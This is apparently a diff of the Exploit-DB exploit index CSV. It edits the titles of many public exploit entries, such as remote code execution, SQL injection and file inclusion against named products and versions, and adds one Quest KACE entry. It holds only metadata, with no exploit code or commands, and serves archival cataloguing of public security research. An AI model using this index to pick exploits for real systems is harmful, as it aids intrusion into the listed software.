Download Manager 5.3.0.2712 - Buffer Overflow (SEH)",2018-02-27,bzyo,remote,windows, 44196,exploits/hardware/remote/44196.md,"Sony Playstation 4 (PS4) 4.55 - 'Jailbreak' 'setAttributeNodeNS' WebKit 5.02 / 'bpf' Kernel Loader 4.55",2018-02-27,Specter,remote,hardware, 44226,exploits/php/remote/44226.txt,"TestLink Open Source Test Management < 1.9.16 - Remote Code Execution",2018-03-02,"Manish Tanwar",remote,php, @@ -16528,7 +16528,7 @@ id,file,description,date,author,type,platform,port 44229,exploits/php/remote/44229.txt,"WordPress Plugin Polls 1.2.4 - SQL Injection (PoC)",2017-10-22,"Manish Tanwar",remote,php, 44242,exploits/android/remote/44242.md,"Papenmeier WiFi Baby Monitor Free & Lite < 2.02.2 - Remote Audio Record",2018-02-25,iamrastating,remote,android, 44245,exploits/hardware/remote/44245.rb,"NETGEAR - 'TelnetEnable' Magic Packet (Metasploit)",2018-03-05,Metasploit,remote,hardware,23 -44253,exploits/hardware/remote/44253.py,"Tenda AC15 Router - Unauthenticated Remote Code Execution",2018-02-14,"Tim Carrington",remote,hardware, +44253,exploits/hardware/remote/44253.py,"Tenda AC15 Router - Remote Code Execution",2018-02-14,"Tim Carrington",remote,hardware, 44280,exploits/multiple/remote/44280.rb,"Eclipse Equinoxe OSGi Console - Command Execution (Metasploit)",2018-03-12,Metasploit,remote,multiple, 44283,exploits/hardware/remote/44283.py,"MikroTik RouterOS < 6.38.4 (MIPSBE) - 'Chimay Red' Stack Clash Remote Code Execution",2018-03-12,"Lorenzo Santina",remote,hardware, 44284,exploits/hardware/remote/44284.py,"MikroTik RouterOS < 6.38.4 (x86) - 'Chimay Red' Stack Clash Remote Code Execution",2018-03-12,"Lorenzo Santina",remote,hardware, @@ -16536,7 +16536,7 @@ id,file,description,date,author,type,platform,port 44292,exploits/windows/remote/44292.py,"SAP NetWeaver AS JAVA CRM - Log injection Remote Command Execution",2018-03-14,"erp scan team",remote,windows, 44293,exploits/windows/remote/44293.html,"Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution",2018-03-16,Rh0,remote,windows, 44294,exploits/windows/remote/44294.html,"Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution",2018-03-16,Rh0,remote,windows, -44297,exploits/linux/remote/44297.py,"Unitrends UEB 10.0 - Unauthenticated Root Remote Code Execution",2018-03-16,"Jared Arave",remote,linux, +44297,exploits/linux/remote/44297.py,"Unitrends UEB 10.0 - Root Remote Code Execution",2018-03-16,"Jared Arave",remote,linux, 44345,exploits/windows/remote/44345.txt,"Acrolinx Server < 5.2.5 - Directory Traversal",2018-03-26,"Berk Dusunur",remote,windows, 44349,exploits/linux/remote/44349.md,"TestLink Open Source Test Management < 1.9.16 - Remote Code Execution (PoC)",2018-03-27,"Manish Tanwar",remote,linux, 44356,exploits/windows/remote/44356.rb,"GitStack - Unsanitized Argument Remote Code Execution (Metasploit)",2018-03-29,Metasploit,remote,windows, @@ -16557,7 +16557,7 @@ id,file,description,date,author,type,platform,port 44554,exploits/android/remote/44554.py,"Android Bluetooth - 'Blueborne' Information Leak (1)",2017-08-09,"Kert Ojasoo",remote,android, 44555,exploits/android/remote/44555.py,"Android Bluetooth - 'Blueborne' Information Leak (2)",2017-09-20,"Kert Ojasoo",remote,android, 44556,exploits/multiple/remote/44556.py,"Apache Struts 2.0.1 < 2.3.33 / 2.5 < 2.5.10 - Arbitrary Code Execution",2017-09-08,brianwrf,remote,multiple, -44568,exploits/php/remote/44568.rb,"xdebug < 2.5.5 - Unauthenticated OS Command Execution (Metasploit)",2018-05-02,Metasploit,remote,php,80 +44568,exploits/php/remote/44568.rb,"xdebug < 2.5.5 - OS Command Execution (Metasploit)",2018-05-02,Metasploit,remote,php,80 44569,exploits/ruby/remote/44569.rb,"Metasploit Framework - 'msfd' Remote Code Execution (via Browser) (Metasploit)",2018-05-02,Metasploit,remote,ruby,55554 44570,exploits/ruby/remote/44570.rb,"Metasploit Framework - 'msfd' Remote Code Execution (Metasploit)",2018-05-02,Metasploit,remote,ruby,55554 44571,exploits/linux/remote/44571.py,"Exim < 4.90.1 - 'base64d' Remote Code Execution",2018-05-02,straight_blast,remote,linux,25 @@ -16568,8 +16568,8 @@ id,file,description,date,author,type,platform,port 44584,exploits/multiple/remote/44584.txt,"Google Chrome V8 - Object Allocation Size Integer Overflow",2018-05-04,"Google Security Research",remote,multiple, 44596,exploits/windows/remote/44596.py,"FTPShell Client 6.7 - Buffer Overflow",2018-05-08,r4wd3r,remote,windows, 44597,exploits/unix/remote/44597.rb,"Palo Alto Networks - 'readSessionVarsFromFile()' Session Corruption (Metasploit)",2018-05-08,Metasploit,remote,unix,443 -44598,exploits/php/remote/44598.rb,"PlaySMS - 'import.php' Authenticated CSV File Upload Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php, -44599,exploits/php/remote/44599.rb,"PlaySMS 1.4 - 'sendfromfile.php?Filename' Authenticated 'Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php, +44598,exploits/php/remote/44598.rb,"PlaySMS - 'import.php' (Authenticated) CSV File Upload Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php, +44599,exploits/php/remote/44599.rb,"PlaySMS 1.4 - 'sendfromfile.php?Filename' (Authenticated) 'Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php, 44611,exploits/php/remote/44611.rb,"Mantis Bug Tracker 1.1.3 - 'manage_proj_page' PHP Code Execution (Metasploit)",2018-05-10,Metasploit,remote,php,80 44616,exploits/windows/remote/44616.py,"Microsoft Windows 2003 SP2 - 'RRAS' SMB Remote Code Execution",2018-05-13,vportal,remote,windows, 44635,exploits/hardware/remote/44635.py,"Inteno IOPSYS 2.0 < 4.2.0 - 'p910nd' Remote Command Execution",2018-05-16,neonsea,remote,hardware,9100 @@ -16584,6 +16584,7 @@ id,file,description,date,author,type,platform,port 44822,exploits/linux/remote/44822.txt,"Git < 2.17.1 - Remote Code Execution",2018-06-01,JameelNabbo,remote,linux, 44829,exploits/linux/remote/44829.py,"CyberArk < 10 - Memory Disclosure",2018-06-04,"Thomas Zuk",remote,linux, 44836,exploits/ios/remote/44836.rb,"WebKit - not_number defineProperties UAF (Metasploit)",2018-06-05,Metasploit,remote,ios, +44950,exploits/unix/remote/44950.rb,"Quest KACE Systems Management - Command Injection (Metasploit)",2018-06-27,Metasploit,remote,unix, 44890,exploits/linux/remote/44890.rb,"DHCP Client - Command Injection 'DynoRoot' (Metasploit)",2018-06-13,Metasploit,remote,linux, 44921,exploits/linux/remote/44921.txt,"Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution",2018-06-21,"Paul Taylor",remote,linux,22 44941,exploits/windows/remote/44941.txt,"Foxit Reader 9.0.1.1049 - Remote Code Execution",2018-06-25,mr_me,remote,windows, @@ -16686,7 +16687,7 @@ id,file,description,date,author,type,platform,port 1012,exploits/asp/webapps/1012.txt,"Maxwebportal 1.36 - 'Password.asp' Change Password (1) (HTML)",2005-05-26,"Soroush Dalili",webapps,asp, 1013,exploits/php/webapps/1013.pl,"Invision Power Board 2.0.3 - 'login.php' SQL Injection",2005-05-26,"Petey Beege",webapps,php, 1014,exploits/php/webapps/1014.txt,"Invision Power Board 2.0.3 - 'login.php' SQL Injection (Tutorial)",2005-05-27,"Danica Jones",webapps,php, -1015,exploits/asp/webapps/1015.txt,"Hosting Controller 0.6.1 - Unauthenticated User Registration (3)",2005-05-27,"Soroush Dalili",webapps,asp, +1015,exploits/asp/webapps/1015.txt,"Hosting Controller 0.6.1 - User Registration (3)",2005-05-27,"Soroush Dalili",webapps,asp, 1016,exploits/php/webapps/1016.pl,"phpStat 1.5 - 'setup.php' Authentication Bypass (Perl)",2005-05-30,Alpha_Programmer,webapps,php, 1017,exploits/php/webapps/1017.php,"phpStat 1.5 - 'setup.php' Authentication Bypass (PHP) (1)",2005-05-30,mh_p0rtal,webapps,php, 1018,exploits/php/webapps/1018.php,"phpStat 1.5 - 'setup.php' Authentication Bypass (PHP) (2)",2005-05-30,Nikyt0x,webapps,php, @@ -17642,7 +17643,7 @@ id,file,description,date,author,type,platform,port 2659,exploits/php/webapps/2659.php,"N/X WCMS 4.1 - 'nxheader.inc.php' Remote File Inclusion",2006-10-27,Kacper,webapps,php, 2660,exploits/php/webapps/2660.php,"Coppermine Photo Gallery 1.4.9 - SQL Injection",2006-10-27,w4ck1ng,webapps,php, 2661,exploits/asp/webapps/2661.asp,"PHP League 0.82 - 'classement.php' SQL Injection",2006-10-27,ajann,webapps,asp, -2662,exploits/asp/webapps/2662.txt,"Hosting Controller 6.1 Hotfix 3.2 - Unauthenticated Access",2006-10-27,"Soroush Dalili",webapps,asp, +2662,exploits/asp/webapps/2662.txt,"Hosting Controller 6.1 Hotfix 3.2 - Access",2006-10-27,"Soroush Dalili",webapps,asp, 2663,exploits/php/webapps/2663.txt,"PhpShop Core 0.9.0 RC1 - 'PS_BASE' File Inclusion",2006-10-28,"Cold Zero",webapps,php, 2664,exploits/php/webapps/2664.pl,"PHPMyDesk 1.0 Beta - 'viewticket.php' Local File Inclusion",2006-10-28,Kw3[R]Ln,webapps,php, 2665,exploits/php/webapps/2665.txt,"FreePBX 2.1.3 - 'upgrade.php' Remote File Inclusion",2006-10-28,"Mehmet Ince",webapps,php, @@ -18316,7 +18317,7 @@ id,file,description,date,author,type,platform,port 3717,exploits/php/webapps/3717.txt,"WebKalk2 1.9.0 - 'absolute_path' Remote File Inclusion",2007-04-12,GoLd_M,webapps,php, 3718,exploits/php/webapps/3718.txt,"RicarGBooK 1.2.1 - 'lang' Local File Inclusion",2007-04-12,Dj7xpl,webapps,php, 3719,exploits/php/webapps/3719.pl,"MyBulletinBoard (MyBB) 1.2.2 - 'CLIENT-IP' SQL Injection",2007-04-12,Elekt,webapps,php, -3721,exploits/php/webapps/3721.pl,"e107 0.7.8 - 'mailout.php' Authenticated Access Escalation",2007-04-12,Gammarays,webapps,php, +3721,exploits/php/webapps/3721.pl,"e107 0.7.8 - 'mailout.php' (Authenticated) Access Escalation",2007-04-12,Gammarays,webapps,php, 3722,exploits/php/webapps/3722.txt,"Expow 0.8 - 'autoindex.php?cfg_file' Remote File Inclusion",2007-04-12,mdx,webapps,php, 3723,exploits/php/webapps/3723.txt,"Request It 1.0b - 'index.php?id' Remote File Inclusion",2007-04-12,hackberry,webapps,php, 3725,exploits/php/webapps/3725.php,"Chatness 2.5.3 - '/options.php/save.php' Remote Code Execution",2007-04-12,Gammarays,webapps,php, @@ -19487,7 +19488,7 @@ id,file,description,date,author,type,platform,port 5488,exploits/php/webapps/5488.txt,"Joomla! Component Filiale 1.0.4 - 'idFiliale' SQL Injection",2008-04-23,str0xo,webapps,php, 5490,exploits/php/webapps/5490.pl,"YouTube Clone Script - 'spages.php' Remote Code Execution",2008-04-23,Inphex,webapps,php, 5491,exploits/php/webapps/5491.txt,"Joomla! Component Community Builder 1.0.1 - Blind SQL Injection",2008-04-23,$hur!k'n,webapps,php, -5493,exploits/php/webapps/5493.txt,"Joomla! Component JPad 1.0 - Authenticated SQL Injection",2008-04-24,His0k4,webapps,php, +5493,exploits/php/webapps/5493.txt,"Joomla! Component JPad 1.0 - (Authenticated) SQL Injection",2008-04-24,His0k4,webapps,php, 5494,exploits/php/webapps/5494.txt,"MiniBB 2.2 - Cross-Site Scripting / SQL Injection / Full Path Disclosure",2008-04-25,girex,webapps,php, 5495,exploits/php/webapps/5495.txt,"PostNuke Module PostSchedule 1.0 - 'eid' SQL Injection",2008-04-25,Kacper,webapps,php, 5497,exploits/php/webapps/5497.txt,"Joomla! Component Joomla-Visites 1.1 RC2 - Remote File Inclusion",2008-04-25,NoGe,webapps,php, @@ -20283,7 +20284,7 @@ id,file,description,date,author,type,platform,port 6511,exploits/php/webapps/6511.txt,"6rbScript 3.3 - 'singerid' SQL Injection",2008-09-21,"Hussin X",webapps,php, 6512,exploits/php/webapps/6512.txt,"Diesel Job Site - 'job_id' Blind SQL Injection",2008-09-21,Stack,webapps,php, 6513,exploits/php/webapps/6513.txt,"Rianxosencabos CMS 0.9 - Arbitrary Add Admin",2008-09-21,"CWH Underground",webapps,php, -6514,exploits/php/webapps/6514.txt,"AvailScript Jobs Portal Script - Authenticated Arbitrary File Upload",2008-09-21,InjEctOr5,webapps,php, +6514,exploits/php/webapps/6514.txt,"AvailScript Jobs Portal Script - (Authenticated) Arbitrary File Upload",2008-09-21,InjEctOr5,webapps,php, 6516,exploits/php/webapps/6516.txt,"e107 Plugin Image Gallery 0.9.6.2 - SQL Injection",2008-09-21,boom3rang,webapps,php, 6517,exploits/php/webapps/6517.txt,"Netartmedia Jobs Portal 1.3 - Multiple SQL Injections",2008-09-21,Encrypt3d.M!nd,webapps,php, 6518,exploits/php/webapps/6518.txt,"Netartmedia Real Estate Portal 1.2 - SQL Injection",2008-09-21,Encrypt3d.M!nd,webapps,php, @@ -21470,7 +21471,7 @@ id,file,description,date,author,type,platform,port 8087,exploits/cgi/webapps/8087.txt,"i-dreams GB Server - 'admin.dat' File Disclosure",2009-02-20,Pouya_Server,webapps,cgi, 8088,exploits/php/webapps/8088.txt,"Osmodia Bulletin Board 1.x - 'admin.txt' File Disclosure",2009-02-20,Pouya_Server,webapps,php, 8089,exploits/php/webapps/8089.pl,"Graugon Forum 1 - 'id' Command Injection / SQL Injection",2009-02-20,Osirys,webapps,php, -8092,exploits/php/webapps/8092.txt,"zFeeder 1.6 - 'admin.php' Unauthenticated Admin Bypass",2009-02-23,ahmadbady,webapps,php, +8092,exploits/php/webapps/8092.txt,"zFeeder 1.6 - 'admin.php' Admin Bypass",2009-02-23,ahmadbady,webapps,php, 8093,exploits/php/webapps/8093.pl,"pPIM 1.01 - 'notes.php' Remote Command Execution",2009-02-23,JosS,webapps,php, 8094,exploits/php/webapps/8094.pl,"Free Arcade Script 1.0 - Local File Inclusion Command Execution",2009-02-23,Osirys,webapps,php, 8095,exploits/php/webapps/8095.pl,"Pyrophobia 2.1.3.1 - Local File Inclusion Command Execution",2009-02-23,Osirys,webapps,php, @@ -21543,7 +21544,7 @@ id,file,description,date,author,type,platform,port 8240,exploits/php/webapps/8240.txt,"DeluxeBB 1.3 - 'qorder' SQL Injection",2009-03-18,girex,webapps,php, 8243,exploits/php/webapps/8243.txt,"Bloginator 1a - Cookie Bypass / SQL Injection",2009-03-19,Fireshot,webapps,php, 8244,exploits/php/webapps/8244.txt,"Bloginator 1a - SQL Injection / Command Injection (via Cookie Bypass )",2009-03-19,Fireshot,webapps,php, -8247,exploits/cgi/webapps/8247.txt,"Hannon Hill Cascade Server - Authenticated Command Execution",2009-03-19,"Emory University",webapps,cgi, +8247,exploits/cgi/webapps/8247.txt,"Hannon Hill Cascade Server - (Authenticated) Command Execution",2009-03-19,"Emory University",webapps,cgi, 8252,exploits/php/webapps/8252.txt,"Pixie CMS - Cross-Site Scripting / SQL Injection",2009-03-20,"Justin Keane",webapps,php, 8254,exploits/php/webapps/8254.pl,"WBB3 rGallery 1.2.3 - 'UserGallery' Blind SQL Injection",2009-03-23,Invisibility,webapps,php, 8255,exploits/php/webapps/8255.txt,"Supernews 1.5 - 'valor.php?noticia' SQL Injection",2009-03-23,p3s0k!,webapps,php, @@ -21590,7 +21591,7 @@ id,file,description,date,author,type,platform,port 8347,exploits/php/webapps/8347.php,"glFusion 1.1.2 - 'COM_applyFilter()/cookies' Blind SQL Injection",2009-04-03,Nine:Situations:Group,webapps,php, 8348,exploits/php/webapps/8348.txt,"form2list - 'page.php?id' SQL Injection",2009-04-03,Cyber-Zone,webapps,php, 8349,exploits/php/webapps/8349.c,"Family Connections 1.8.2 - Arbitrary File Upload",2009-04-03,"Salvatore Fresta",webapps,php, -8350,exploits/php/webapps/8350.txt,"Gravity Board X 2.0 Beta - SQL Injection / Authenticated Code Execution",2009-04-03,brain[pillow],webapps,php, +8350,exploits/php/webapps/8350.txt,"Gravity Board X 2.0 Beta - SQL Injection / (Authenticated) Code Execution",2009-04-03,brain[pillow],webapps,php, 8351,exploits/php/webapps/8351.pl,"AdaptBB 1.0 - 'topic_id' SQL Injection / Credentials Disclosure",2009-04-03,StAkeR,webapps,php, 8353,exploits/php/webapps/8353.txt,"Joomla! Component com_bookJoomlas 0.1 - SQL Injection",2009-04-06,"Salvatore Fresta",webapps,php, 8355,exploits/php/webapps/8355.txt,"FlexCMS Calendar - 'itemID' Blind SQL Injection",2009-04-06,Lanti-Net,webapps,php, @@ -22234,7 +22235,7 @@ id,file,description,date,author,type,platform,port 9399,exploits/php/webapps/9399.txt,"Logoshows BBS 2.0 - Authentication Bypass",2009-08-07,Dns-Team,webapps,php, 9400,exploits/php/webapps/9400.txt,"logoshows bbs 2.0 - File Disclosure / Insecure Cookie Handling",2009-08-07,ZoRLu,webapps,php, 9404,exploits/php/webapps/9404.txt,"SmilieScript 1.0 - Authentication Bypass",2009-08-10,Mr.tro0oqy,webapps,php, -9405,exploits/php/webapps/9405.txt,"Papoo CMS 3.7.3 - Authenticated Arbitrary Code Execution",2009-08-10,"RedTeam Pentesting",webapps,php, +9405,exploits/php/webapps/9405.txt,"Papoo CMS 3.7.3 - (Authenticated) Arbitrary Code Execution",2009-08-10,"RedTeam Pentesting",webapps,php, 9406,exploits/php/webapps/9406.txt,"Mini-CMS 1.0.1 - 'page.php' SQL Injection",2009-08-10,Ins3t,webapps,php, 9407,exploits/php/webapps/9407.txt,"CMS Made Simple 1.6.2 - Local File Disclosure",2009-08-10,IHTeam,webapps,php, 9408,exploits/php/webapps/9408.php,"Joomla! Component Kunena Forums (com_kunena) - Blind SQL Injection",2009-08-10,"ilker Kandemir",webapps,php, @@ -22460,7 +22461,7 @@ id,file,description,date,author,type,platform,port 9964,exploits/php/webapps/9964.txt,"RunCMS 2m1 - 'store()' SQL Injection",2009-10-26,bookoo,webapps,php, 9965,exploits/php/webapps/9965.txt,"RunCMS 2ma - 'post.php' SQL Injection",2009-10-26,bookoo,webapps,php, 9967,exploits/asp/webapps/9967.txt,"SharePoint 2007 - Team Services Source Code Disclosure",2009-10-26,"Daniel Martin",webapps,asp, -33434,exploits/windows/webapps/33434.rb,"HP Release Control - Authenticated XML External Entity (Metasploit)",2014-05-19,"Brandon Perry",webapps,windows,80 +33434,exploits/windows/webapps/33434.rb,"HP Release Control - (Authenticated) XML External Entity (Metasploit)",2014-05-19,"Brandon Perry",webapps,windows,80 9975,exploits/hardware/webapps/9975.txt,"Alteon OS BBI (Nortell) - Cross-Site Scripting / Cross-Site Request Forgery",2009-11-16,"Alexey Sintsov",webapps,hardware,80 9978,exploits/php/webapps/9978.txt,"TwonkyMedia Server 4.4.17/5.0.65 - Cross-Site Scripting",2009-10-23,"Davide Canali",webapps,php, 9979,exploits/php/webapps/9979.txt,"Vivvo CMS 4.1.5.1 - file Disclosure",2009-10-22,"Janek Vind",webapps,php, @@ -23995,12 +23996,12 @@ id,file,description,date,author,type,platform,port 28047,exploits/php/webapps/28047.txt,"CMS Faethon 1.3.2 - Multiple Remote File Inclusions",2006-06-17,"M.Hasran Addahroni",webapps,php, 28048,exploits/php/webapps/28048.txt,"RahnemaCo - 'page.php' PageID Remote File Inclusion",2006-06-17,CrAzY.CrAcKeR,webapps,php, 28128,exploits/php/webapps/28128.txt,"CMS Mini 0.2.2 - Multiple Vulnerabilities",2013-09-06,SANTHO,webapps,php,80 -12679,exploits/windows/webapps/12679.txt,"3Com* iMC (Intelligent Management Center) - Unauthenticated Traversal File Retrieval",2010-05-21,"Richard Brain",webapps,windows, +12679,exploits/windows/webapps/12679.txt,"3Com* iMC (Intelligent Management Center) - Traversal File Retrieval",2010-05-21,"Richard Brain",webapps,windows, 12680,exploits/windows/webapps/12680.txt,"3Com* iMC (Intelligent Management Center) - Cross-Site Scripting / Information Disclosure Flaws",2010-05-21,"Richard Brain",webapps,windows, 12684,exploits/php/webapps/12684.txt,"ConPresso 4.0.7 - SQL Injection",2010-05-21,Gamoscu,webapps,php, 12686,exploits/php/webapps/12686.txt,"Online University - Authentication Bypass",2010-05-21,cr4wl3r,webapps,php, 12688,exploits/php/webapps/12688.txt,"JV2 Folder Gallery 3.1 - 'gallery.php' Remote File Inclusion",2010-05-21,"Sn!pEr.S!Te Hacker",webapps,php, -12689,exploits/multiple/webapps/12689.txt,"Apache Axis2 Administration Console - Authenticated Cross-Site Scripting",2010-05-21,"Richard Brain",webapps,multiple, +12689,exploits/multiple/webapps/12689.txt,"Apache Axis2 Administration Console - (Authenticated) Cross-Site Scripting",2010-05-21,"Richard Brain",webapps,multiple, 12690,exploits/php/webapps/12690.php,"cardinalCMS 1.2 - 'FCKeditor' Arbitrary File Upload",2010-05-21,Ma3sTr0-Dz,webapps,php, 12691,exploits/php/webapps/12691.txt,"Online Job Board - Authentication Bypass",2010-05-21,cr4wl3r,webapps,php, 14322,exploits/php/webapps/14322.txt,"Edgephp ClickBank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",webapps,php, @@ -24466,7 +24467,7 @@ id,file,description,date,author,type,platform,port 14299,exploits/php/webapps/14299.txt,"CMS Contentia - 'news.php' SQL Injection",2010-07-09,GlaDiaT0R,webapps,php, 14306,exploits/php/webapps/14306.txt,"HoloCMS 9.0.47 - 'news.php' SQL Injection",2010-07-09,GlaDiaT0R,webapps,php, 14308,exploits/php/webapps/14308.txt,"WordPress Plugin Firestats - Remote Configuration File Download",2010-07-09,"Jelmer de Hen",webapps,php, -14310,exploits/php/webapps/14310.js,"dotDefender 3.8-5 - Unauthenticated Remote Code Execution (via Cross-Site Scripting)",2010-07-09,rAWjAW,webapps,php,80 +14310,exploits/php/webapps/14310.js,"dotDefender 3.8-5 - Remote Code Execution (via Cross-Site Scripting)",2010-07-09,rAWjAW,webapps,php,80 14313,exploits/php/webapps/14313.txt,"Joomla! Component MyHome - Blind SQL Injection",2010-07-10,Sid3^effects,webapps,php, 14315,exploits/php/webapps/14315.txt,"Joomla! Component MySMS - Arbitrary File Upload",2010-07-10,Sid3^effects,webapps,php, 14335,exploits/php/webapps/14335.txt,"Joomla! Component healthstats - Persistent Cross-Site Scripting",2010-07-12,Sid3^effects,webapps,php, @@ -25089,7 +25090,7 @@ id,file,description,date,author,type,platform,port 15800,exploits/php/webapps/15800.txt,"html-edit CMS - Multiple Vulnerabilities",2010-12-21,"High-Tech Bridge SA",webapps,php, 15801,exploits/php/webapps/15801.txt,"Joomla! Component com_xgallery 1.0 - Local File Inclusion",2010-12-21,KelvinX,webapps,php, 15804,exploits/php/webapps/15804.txt,"jobappr 1.4 - Multiple Vulnerabilities",2010-12-21,giudinvx,webapps,php, -15807,exploits/cgi/webapps/15807.txt,"Mitel AWC - Unauthenticated Command Execution",2010-12-22,Procheckup,webapps,cgi, +15807,exploits/cgi/webapps/15807.txt,"Mitel AWC - Command Execution",2010-12-22,Procheckup,webapps,cgi, 15808,exploits/php/webapps/15808.txt,"WordPress Plugin Accept Signups 0.1 - Cross-Site Scripting",2010-12-22,clshack,webapps,php, 15810,exploits/hardware/webapps/15810.txt,"D-Link WBR-1310 - Authentication Bypass",2010-12-23,"Craig Heffner",webapps,hardware, 15811,exploits/php/webapps/15811.txt,"Built2Go PHP Shopping - SQL Injection",2010-12-23,Br0ly,webapps,php, @@ -25123,7 +25124,7 @@ id,file,description,date,author,type,platform,port 15850,exploits/php/webapps/15850.html,"PiXie CMS 1.04 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-12-29,"Ali Raheem",webapps,php, 15852,exploits/php/webapps/15852.txt,"Siteframe CMS 3.2.3 - 'user.php' SQL Injection",2010-12-29,"AnGrY BoY",webapps,php, 15853,exploits/php/webapps/15853.txt,"DGNews 2.1 - SQL Injection",2010-12-29,kalashnikov,webapps,php, -15856,exploits/php/webapps/15856.php,"TYPO3 - Unauthenticated Arbitrary File Retrieval",2010-12-29,ikki,webapps,php, +15856,exploits/php/webapps/15856.php,"TYPO3 - Arbitrary File Retrieval",2010-12-29,ikki,webapps,php, 15857,exploits/php/webapps/15857.txt,"Discovery TorrentTrader 2.6 - Multiple Vulnerabilities",2010-12-29,EsS4ndre,webapps,php, 15858,exploits/php/webapps/15858.txt,"WordPress 3.0.3 - Persistent Cross-Site Scripting (Internet Explorer 6/7 / NS8.1)",2010-12-29,Saif,webapps,php, 15863,exploits/php/webapps/15863.txt,"LightNEasy 3.2.2 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",webapps,php, @@ -25292,7 +25293,7 @@ id,file,description,date,author,type,platform,port 16274,exploits/jsp/webapps/16274.pl,"JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote Command Execution",2011-03-04,kingcope,webapps,jsp, 16276,exploits/php/webapps/16276.txt,"ADAN Neuronlabs - 'view.php' SQL Injection",2011-03-04,IRAQ_JAGUAR,webapps,php, 16279,exploits/php/webapps/16279.txt,"MySms 1.0 - Multiple Vulnerabilities",2011-03-05,AtT4CKxT3rR0r1ST,webapps,php, -16280,exploits/php/webapps/16280.py,"vTiger CRM 5.0.4 - Unauthenticated Local File Inclusion",2011-03-05,TecR0c,webapps,php, +16280,exploits/php/webapps/16280.py,"vTiger CRM 5.0.4 - Local File Inclusion",2011-03-05,TecR0c,webapps,php, 16281,exploits/php/webapps/16281.txt,"BoutikOne - 'description.php' SQL Injection",2011-03-05,IRAQ_JAGUAR,webapps,php, 41784,exploits/php/webapps/41784.txt,"Pixie 1.0.4 - Arbitrary File Upload",2017-04-02,rungga_reksya,webapps,php, 16313,exploits/php/webapps/16313.rb,"FreeNAS - 'exec_raw.php' Arbitrary Command Execution (Metasploit)",2010-11-24,Metasploit,webapps,php, @@ -25351,13 +25352,13 @@ id,file,description,date,author,type,platform,port 16954,exploits/php/webapps/16954.txt,"Keynect eCommerce - SQL Injection",2011-03-10,"Arturo Zamora",webapps,php, 16955,exploits/asp/webapps/16955.txt,"SmarterMail 7.3/7.4 - Multiple Vulnerabilities",2011-03-10,"Hoyt LLC Research",webapps,asp, 16959,exploits/multiple/webapps/16959.txt,"Oracle WebLogic - POST Session Fixation",2011-03-11,"Roberto Suggi Liverani",webapps,multiple, -16961,exploits/php/webapps/16961.py,"N_CMS 1.1E - Unauthenticated Local File Inclusion / Remote Code",2011-03-11,TecR0c,webapps,php, +16961,exploits/php/webapps/16961.py,"N_CMS 1.1E - Local File Inclusion / Remote Code",2011-03-11,TecR0c,webapps,php, 16962,exploits/asp/webapps/16962.txt,"SmarterStats 6.0 - Multiple Vulnerabilities",2011-03-11,"Hoyt LLC Research",webapps,asp, 16963,exploits/php/webapps/16963.txt,"Constructr CMS 3.03 - Multiple Remote Vulnerabilities",2011-03-11,LiquidWorm,webapps,php, 16968,exploits/php/webapps/16968.txt,"Cover Vision - SQL Injection",2011-03-13,Egyptian.H4x0rz,webapps,php, 16969,exploits/php/webapps/16969.txt,"Log1 CMS 2.0 - Multiple Vulnerabilities",2011-03-14,Aodrulez,webapps,php, 16975,exploits/asp/webapps/16975.txt,"SmarterMail 8.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-14,"Hoyt LLC Research",webapps,asp, -16980,exploits/php/webapps/16980.py,"IF-CMS 2.07 - Unauthenticated Local File Inclusion (1)",2011-03-15,TecR0c,webapps,php, +16980,exploits/php/webapps/16980.py,"IF-CMS 2.07 - Local File Inclusion (1)",2011-03-15,TecR0c,webapps,php, 16982,exploits/php/webapps/16982.txt,"LotusCMS 3.0.3 - Multiple Vulnerabilities",2011-03-16,"High-Tech Bridge SA",webapps,php, 16987,exploits/php/webapps/16987.txt,"pointter PHP content management system 1.2 - Multiple Vulnerabilities",2011-03-16,LiquidWorm,webapps,php, 16988,exploits/php/webapps/16988.txt,"WikiWig 5.01 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-16,"AutoSec Tools",webapps,php, @@ -25443,7 +25444,7 @@ id,file,description,date,author,type,platform,port 17170,exploits/php/webapps/17170.txt,"EZ-Shop 1.02 - Lateral SQL Injection",2011-04-14,Osirys,webapps,php, 17172,exploits/php/webapps/17172.txt,"cPassMan 1.82 - Arbitrary File Download",2011-04-15,"Sense of Security",webapps,php, 17173,exploits/php/webapps/17173.txt,"TextAds 2.08 Script - Cross-Site Scripting",2011-04-15,"Ashiyane Digital Security Team",webapps,php, -17174,exploits/multiple/webapps/17174.txt,"SQL-Ledger 2.8.33 - Authenticated Local File Inclusion / Edit",2011-04-15,bitform,webapps,multiple, +17174,exploits/multiple/webapps/17174.txt,"SQL-Ledger 2.8.33 - (Authenticated) Local File Inclusion / Edit",2011-04-15,bitform,webapps,multiple, 17176,exploits/asp/webapps/17176.txt,"SoftXMLCMS - Arbitrary File Upload",2011-04-16,Alexander,webapps,asp, 17183,exploits/php/webapps/17183.txt,"osPHPSite - SQL Injection",2011-04-17,vir0e5,webapps,php, 17197,exploits/php/webapps/17197.txt,"First Escort Marketing CMS - Multiple SQL Injections Vulnerabilities",2011-04-22,NoNameMT,webapps,php, @@ -25548,7 +25549,7 @@ id,file,description,date,author,type,platform,port 17412,exploits/php/webapps/17412.txt,"Joomla! Component com_team - SQL Injection",2011-06-19,CoBRa_21,webapps,php, 17413,exploits/php/webapps/17413.txt,"Burning Board 3.1.5 - Full Path Disclosure",2011-06-19,linc0ln.dll,webapps,php, 17414,exploits/php/webapps/17414.txt,"Joomla! Component com_calcbuilder - 'id' Blind SQL Injection",2011-06-19,"Chip d3 bi0s",webapps,php, -17418,exploits/php/webapps/17418.rb,"IF-CMS 2.07 - Unauthenticated Local File Inclusion (Metasploit) (2)",2011-06-20,TecR0c,webapps,php, +17418,exploits/php/webapps/17418.rb,"IF-CMS 2.07 - Local File Inclusion (Metasploit) (2)",2011-06-20,TecR0c,webapps,php, 